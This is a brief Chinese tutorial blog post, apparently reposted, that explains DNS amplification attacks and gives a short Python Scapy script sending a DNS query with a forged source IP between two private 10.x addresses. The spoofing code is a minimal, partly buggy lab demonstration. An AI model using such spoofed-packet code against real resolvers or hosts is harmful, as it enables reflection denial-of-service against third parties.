用scapy模拟DNS放大攻击

本文介绍了DNS放大攻击的基本原理,包括伪造源IP地址及请求大型TXT记录的过程。通过使用Python的Scapy库模拟攻击行为,读者可以了解如何构造并发送带有伪造源IP的DNS查询。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

首先,DNS放大攻击,简单解释有两点:

1.伪造源IP为其他人的ip地址

2.被请求的记录,要求比较大,比如TXT格式,4000KB

 

在A机器上,向DNS发送查询那个TXT的记录,并伪造成别人的ip,即可理解为DNS放大攻击。

可以用python的scapy模拟:

from scapy import *

a = IP(dst='10.32.8.11',src='10.32.132.85')     #10.32.132.85即为伪造的源ip

b = UDP(dport='53')

c = DNS(id=1,qr=0,opcode=0,tc=0,rd=1,qdcount=1,ancount=0,nscount=0,arcount=0)

c.qd=DNSQR(qname='www.qq.com',qtype=1,qclass=1)

p = a/b/c

send(p)

模拟结束。

在10.32.132.85上抓dns的包,就会收到一条DNS响应,是10.32.8.11发来的。

 

转载于:https://www.cnblogs.com/yd1227/archive/2011/01/24/1943412.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值